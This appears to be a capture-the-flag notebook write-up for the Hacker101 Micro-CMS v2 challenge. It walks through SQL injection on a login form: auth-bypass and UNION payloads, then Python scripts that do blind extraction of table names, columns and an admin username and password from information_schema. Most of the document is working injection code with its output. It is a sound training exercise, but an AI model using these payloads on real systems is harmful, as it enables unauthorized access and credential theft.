# Micro-CMS v2 - Flags captured: 1/3

In [2]:
import requests, time

url = "https://05e2d6b50e4d94f99851c45c962896c2.ctf.hacker101.com/" # Home page

session = requests.Session()

Here we go with the second version of the Micro-CMS website!

## 1° Flag - CAUGHT!

In [ ]:
response = session.get(url)
print(response.text)

time.sleep(1) # Wait for 1 second

Homepage:

```html
<!doctype html>
<html>
    <head>
        <title>Micro-CMS</title>
    </head>
    <body>
        
        <ul>
<li><a href="page/1">Micro-CMS Changelog</a></li>
<li><a href="page/2">Markdown Test</a></li>
        </ul>
        <a href="page/create">Create a new page</a>
    </body>
</html>
```

Let's see the changelog!

In [ ]:
response = session.get(url + "page/1")
print(response.text)

time.sleep(1) # Wait for 1 second

Changelog:
```html
<!doctype html>
<html>
    <head>
        <title>Micro-CMS Changelog</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/1">Edit this page</a>
        <h1>Micro-CMS Changelog</h1>
<h2>Version 2</h2>
<p>This version fixed the multitude of security flaws and general functionality bugs that plagued v1.  Additionally, we added user authentication; we're still not sure why we didn't think about that the first time, but hindsight is 20/20.  By default, users need to be an admin to add or edit pages now.</p>
    </body>
</html>
```

Hopefully the login form is not well-implemented ;)

Now, I want to try to create a new page and see what will happen.

In [ ]:
response = session.get(url + "page/create")
print(response.status_code)
print(response.text)
print(response.url)

time.sleep(1) # Wait for 1 second

The response is:

```html
<!doctype html>
<html>
    <head>
        <title>Log in</title>
    </head>
    <body>
        <a href="home">&lt;-- Go Home</a>
        <h1>Log In</h1>
        <form method="POST">
            Username: <input type="text" name="username"><br>
            Password: <input type="password" name="password"><br>
            <input type="submit" value="Log In">
            <div style="color: red"></div>
        </form>
    </body>
</html>
```

The url of the page obtained is: ```url/login```

As expected, the website redirected us to the login page because we are not logged in.\
I bet that the login form suffers SQL Injection attacks. Let's go testing it!

In [ ]:
print("Trying to login with admin:admin")
response = session.post(url + "login", data= {"username": "admin", "password": "admin"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
print(response.status_code)
print(response.text)

print("Trying to login with ' or 1=1;--:' or 1=1;--")
response = session.post(url + "login", data= {"username": "' or 1=1;--", "password": "' or 1=1;--"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
print(response.status_code)
print(response.text)


First response (login attempt with admin and admin):
```html
<!doctype html>
<html>
    <head>
        <title>Log in</title>
    </head>
    <body>
        <a href="home">&lt;-- Go Home</a>
        <h1>Log In</h1>
        <form method="POST">
            Username: <input type="text" name="username"><br>
            Password: <input type="password" name="password"><br>
            <input type="submit" value="Log In">
            <div style="color: red">Unknown user</div>
        </form>
    </body>
</html>
```

Second response (login attempt with ' or 1=1;-- and ' or 1=1;--):
```html
<!doctype html>
<html>
    <head>
        <title>Log in</title>
    </head>
    <body>
        <a href="home">&lt;-- Go Home</a>
        <h1>Log In</h1>
        <form method="POST">
            Username: <input type="text" name="username"><br>
            Password: <input type="password" name="password"><br>
            <input type="submit" value="Log In">
            <div style="color: red">Invalid password</div>
        </form>
    </body>
</html>
```

Okay, I performed an **SQL Injection** on the username field. However, it didn't work for the password field, maybe because passwords are directly compared. May I fool the system by forcing it to return a fixed password defined by me? If I am able to change what is returned by the select query based on the username I would be able to compare the given password with itself... I need to explore the possibility of using **UNION inside the select query**.

In [ ]:
# Trying to use UNION with 1 column
response = session.post(url + "login", data= {"username": "' UNION select 'ciao';--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
print(response.status_code)
print(response.text)

# Trying to use UNION with 2 columns
response = session.post(url + "login", data= {"username": "' UNION select 'ciao', 'ciao';--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
print(response.status_code)
print(response.text)

# Trying to use UNION with 1 column of different type
response = session.post(url + "login", data= {"username": "' UNION select 1;--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
print(response.status_code)
print(response.text)

First response:
```html
<!doctype html>
<html>
    <head>
        <title>Log in</title>
    </head>
    <body>
        <a href="home">&lt;-- Go Home</a>
        <h1>Log In</h1>
        <form method="POST">
            Username: <input type="text" name="username"><br>
            Password: <input type="password" name="password"><br>
            <input type="submit" value="Log In">
            <div style="color: red">Invalid password</div>
        </form>
    </body>
</html>
```

Second response:
```html
<!doctype html>
<html lang=en>
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
```

Third response:
```html
<!doctype html>
<html>
    <head>
        <title>Log in</title>
    </head>
    <body>
        <a href="home">&lt;-- Go Home</a>
        <h1>Log In</h1>
        <form method="POST">
            Username: <input type="text" name="username"><br>
            Password: <input type="password" name="password"><br>
            <input type="submit" value="Log In">
            <div style="color: red">Invalid password</div>
        </form>
    </body>
</html>
```

From these responses, I can understand that the initial SELECT query returns the values of 1 column and, in addition to this, the DBMS is applying dynamic type casting. In fact, I received a positive response for both an INT and a String additional column.\
Now, I have a doubt... What is the SELECT query fetching? The ID related to that username or the related password?... Let's go testing for the password case.

In [ ]:
# Trying to use UNION with a fixed password
response = session.post(url + "login", data= {"username": "' UNION select 'tip-tap';--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
print(response.status_code)
print(response.text)

Response:
```html
<!doctype html>
<html>
    <head>
        <title>Logged in</title>
    </head>
    <body>
        <h1>Logged In!</h1>
        <a href="home">Go Home</a>
        <script>setTimeout(function() { window.location = 'home'; }, 3000);</script>
        <!-- You got logged in, congrats!  Do you have the real username and password?  If not, might want to do that! -->
    </body>
</html>
```

Good! I have been able to force a fixed password in the login form!\
From the response, I can deduct that I need to retrieve the real username and password... In this case the correct approach might be performing a **Blind SQL Injection**... Let's go bruteforcing both the username and the password!\
Now, the first problem is determining the name of table in which usernames and passwords are stored, otherwise I will not able to refer it directly in my queries. Before of this, I am going to check if the SELECT query used by the website to filter the usernames is based on the LIKE statement instead of the = statement... If I am correct, I will not need to refer the table by its name.

In [ ]:
# Firstly, I need to logout
response = session.get(url + "logout")
print(response.status_code)
print(response.text)

# Trying the wildcard % to login
response = session.post(url + "login", data= {"username": "%';--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
print(response.status_code)
print(response.text)

Response:
```html
<!doctype html>
<html>
    <head>
        <title>Log in</title>
    </head>
    <body>
        <a href="home">&lt;-- Go Home</a>
        <h1>Log In</h1>
        <form method="POST">
            Username: <input type="text" name="username"><br>
            Password: <input type="password" name="password"><br>
            <input type="submit" value="Log In">
            <div style="color: red">Unknown user</div>
        </form>
    </body>
</html>
```

The wildcard ```%``` has not been recognized... So, I need to infer table's name before bruteforcing the username / password.

In [ ]:
# Inferring the table name

import string

already_discovered_tables = "('accounts', 'admins')"

table_name = ""
full_table_name = False

usefull_chars = string.ascii_letters + string.digits + "_-"

print(f"Set of considered characters: {usefull_chars}")

while True:
    
	for c in usefull_chars:
		# Try to add a character to the table name
		response = session.post(url + "login", data= {"username": f"' UNION select table_name FROM information_schema.tables WHERE table_name LIKE '{table_name + c}%' and table_name not in {already_discovered_tables};--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
		time.sleep(0.5)

		if response.status_code == 200 and "Invalid password" in response.text:
			table_name += c
			print(f"Partial table name found: {table_name}")
			
			# Check if the table name is complete
			response = session.post(url + "login", data= {"username": f"' UNION select table_name FROM information_schema.tables WHERE table_name = '{table_name}';--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})

			if response.status_code == 200 and "Invalid password" in response.text:
				full_table_name = True
			else:
				time.sleep(0.5)
			
			break
		
	else:
		if full_table_name:
			print(f"COMPLETE Table name found: {table_name}")
			break

		else:
			raise Exception("Complete table name not found. Current table name: " + table_name)

Output:
```
Set of considered characters: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
Partial table name found: a
Partial table name found: ac
Partial table name found: acc
Partial table name found: acco
Partial table name found: accou
Partial table name found: accoun
Partial table name found: account
Partial table name found: accounts
COMPLETE Table name found: accounts
```

Now, let's go finding the name of the columns of the accounts table! Unfortunately, the accounts table seemed to not be the essential table... So, I inferred another table called 'admins'... it seems to be more interesting! Let's discover its columns.

In [ ]:
# Inferring the column names

import string

table_name = "admins"

already_discovered_columns = "('id', 'username', 'password')"

column = "passwor"
full_column = False

usefull_chars = string.ascii_letters + string.digits + "_-"

print(f"Set of considered characters: {usefull_chars}")

while True:
    
	for c in usefull_chars:
		# Try to add a character to the column name
		response = session.post(url + "login", data= {"username": f"' UNION select 'gino' FROM information_schema.columns WHERE table_name = '{table_name}' and column_name LIKE '{column + c}%' and column_name not in {already_discovered_columns};--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
		time.sleep(0.5)

		if response.status_code == 200 and "Invalid password" in response.text:
			column += c
			print(f"Partial column name found: {column}")
			
			# Check if the column name is complete
			response = session.post(url + "login", data= {"username": f"' UNION select 'gino' FROM information_schema.columns WHERE table_name = '{table_name}' and column_name = '{column}';--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})

			if response.status_code == 200 and "Invalid password" in response.text:
				full_column = True
			else:
				time.sleep(0.5)
			
			break
		
	else:
		if full_column:
			print(f"COMPLETE column found: {column}")
			break

		else:
			raise Exception("Complete column not found. Current column: " + column)

Okay, the columns contained in the table accounts are: ```'current_connections', 'host', 'total_connections', 'user'```. Where are passwords? Probably in the admins table!
Columns contained in the table admins are: ```'id', 'username', 'password'```

In [ ]:
# Inferring the username and the password

import string

SEARCH_USERNAME = False
SEARCH_PASSWORD = False

table_name = "admins"

username = "nicolette"
full_username = False

password = "gracie"
full_password = False

usefull_chars = string.ascii_letters + string.digits + "_-"

print(f"Set of considered characters: {usefull_chars}")

while SEARCH_USERNAME:
    
	for c in usefull_chars:
		# Try to add a character to the username
		response = session.post(url + "login", data= {"username": f"' UNION select username FROM {table_name} WHERE username LIKE '{username + c}%';--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
		time.sleep(0.5)

		if response.status_code == 200 and "Invalid password" in response.text:
			username += c
			print(f"Partial username found: {username}")
			
			# Check if the username is complete
			response = session.post(url + "login", data= {"username": f"' UNION select username FROM {table_name} WHERE username = '{username}';--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})

			if response.status_code == 200 and "Invalid password" in response.text:
				full_username = True
			else:
				time.sleep(0.5)
			
			break
		
	else:
		if full_username:
			print(f"COMPLETE username found: {username}")
			break

		else:
			raise Exception("Complete username not found. Current username: " + username)
		
while SEARCH_PASSWORD:
    
	for c in usefull_chars:
		# Try to add a character to the password
		response = session.post(url + "login", data= {"username": f"' UNION select password FROM {table_name} WHERE username = '{username}' and password LIKE '{password + c}%';--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
		time.sleep(0.5)

		if response.status_code == 200 and "Invalid password" in response.text:
			password += c
			print(f"Partial password found: {password}")
			
			# Check if the password is complete
			response = session.post(url + "login", data= {"username": f"' UNION select password FROM {table_name} WHERE username = '{username}' and password = '{password}';--", "password": "tip-tap"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})

			if response.status_code == 200 and "Invalid password" in response.text:
				full_password = True
			else:
				time.sleep(0.5)
			
			break
		
	else:
		if full_password:
			print(f"COMPLETE password found: {password}")
			break

		else:
			raise Exception("Complete password not found. Password name: " + password)

Good! Username: nicolette. Password: gracie. Let's check them!

In [ ]:
response = session.post(url + "login", data= {"username": "nicolette", "password": "gracie"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
print(response.text)

time.sleep(0.5)


### Boom! The output is directly the flag: ```^FLAG^...$FLAG$```

## 2° Flag

To be continued...